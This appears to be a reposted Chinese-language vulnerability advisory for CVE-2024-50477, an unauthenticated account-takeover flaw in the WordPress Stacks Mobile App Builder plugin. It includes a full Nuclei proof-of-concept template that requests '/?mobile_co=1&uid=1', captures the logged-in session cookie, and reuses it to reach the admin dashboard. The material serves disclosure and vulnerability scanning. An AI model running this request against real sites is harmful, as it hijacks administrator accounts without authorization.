WordPress Stacks Mobile App Builder Authentication Bypass via Account Takeover Vulnerability

漏洞信息

漏洞名称: WordPress Stacks Mobile App Builder Authentication Bypass via Account Takeover Vulnerability

漏洞编号:

  • CVE: CVE-2024-50477

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: WordPress的Stacks Mobile App Builder插件≤5.2.3版本存在一个认证绕过漏洞,该漏洞允许攻击者通过不当处理查询参数来冒充任意用户。Stacks Mobile App Builder是一个WordPress插件,用于帮助用户构建移动应用程序,广泛应用于需要快速部署移动应用解决方案的网站中。该漏洞的技术根源在于插件对查询参数的处理不当,导致攻击者可以绕过正常的认证流程,直接获取到其他用户的会话cookie,从而实现账户接管。这种漏洞的利用不需要任何形式的认证,攻击者可以通过简单的HTTP请求即可完成攻击,极大地增加了攻击的便捷性和危害性。由于该漏洞允许攻击者完全控制受害者的账户,可能导致敏感信息泄露、数据篡改、甚至进一步的网络攻击。鉴于其严重性和易用性,该漏洞被评定为严重级别,建议所有使用受影响版本插件的用户立即升级到最新版本以防范潜在的安全风险。

产品厂商: wpstacksmobile

产品名称: Stacks Mobile App Builder

影响版本: <=5.2.3

来源: https://github.com/projectdiscovery/nuclei-templates/blob/f75d4a1d6187a9ce943a3cc8927731c5f8658544/http%2Fcves%2F2024%2FCVE-2024-50477.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68

id: CVE-2024-50477

info:
name: WordPress Stacks Mobile App Builder <=5.2.3 - Authentication Bypass via Account Takeover
author: stealthcopter,vijay-sutar
severity: critical
description: |
Stacks Mobile App Builder WordPress plugin ≤ 5.2.3 suffers from an authentication bypass vulnerability via improper handling of query parameters, allowing attackers to impersonate arbitrary users.
reference:
- https://github.com/stealthcopter/wordpress-hacking/blob/main/reports/stacks-mobile-app-builder-priv-esc/stacks-mobile-app-builder-priv-esc.md
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stacks-mobile-app-builder/stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover
classification:
cve-id: CVE-2024-50477
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
epss-score: 0.00043
epss-percentile: 0.09677
cpe: cpe:2.3:a:wpstacksmobile:stacks_mobile_app_builder:*:*:*:*:*:wordpress:*:*
cwe-id: CWE-639
metadata:
verified: true
max-request: 2
vendor: wpstacksmobile
product: stacks_mobile_app_builder
tags: cve,cve2024,wordpress,auth-bypass,account-takeover,wp-plugin

http:
- method: GET
path:
- "{{BaseURL}}/?mobile_co=1&uid=1"

redirects: true
cookie-reuse: true
max-redirects: 2

extractors:
- type: regex
name: auth_cookie
group: 0
regex:
- "wordpress_logged_in_[^=]+=[^;]+"

- method: GET
path:
- "{{BaseURL}}/wp-admin/"
headers:
Cookie: "{{auth_cookie}}"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: body
words:
- "Dashboard"
- "Welcome to WordPress!"
condition: or

- type: word
part: header
words:
- text/html



WordPress Stacks Mobile App Builder Authentication Bypass via Account Takeover Vulnerability
http://example.com/2025/07/16/github_3037620868/
作者
lianccc
发布于
2025年7月16日
许可协议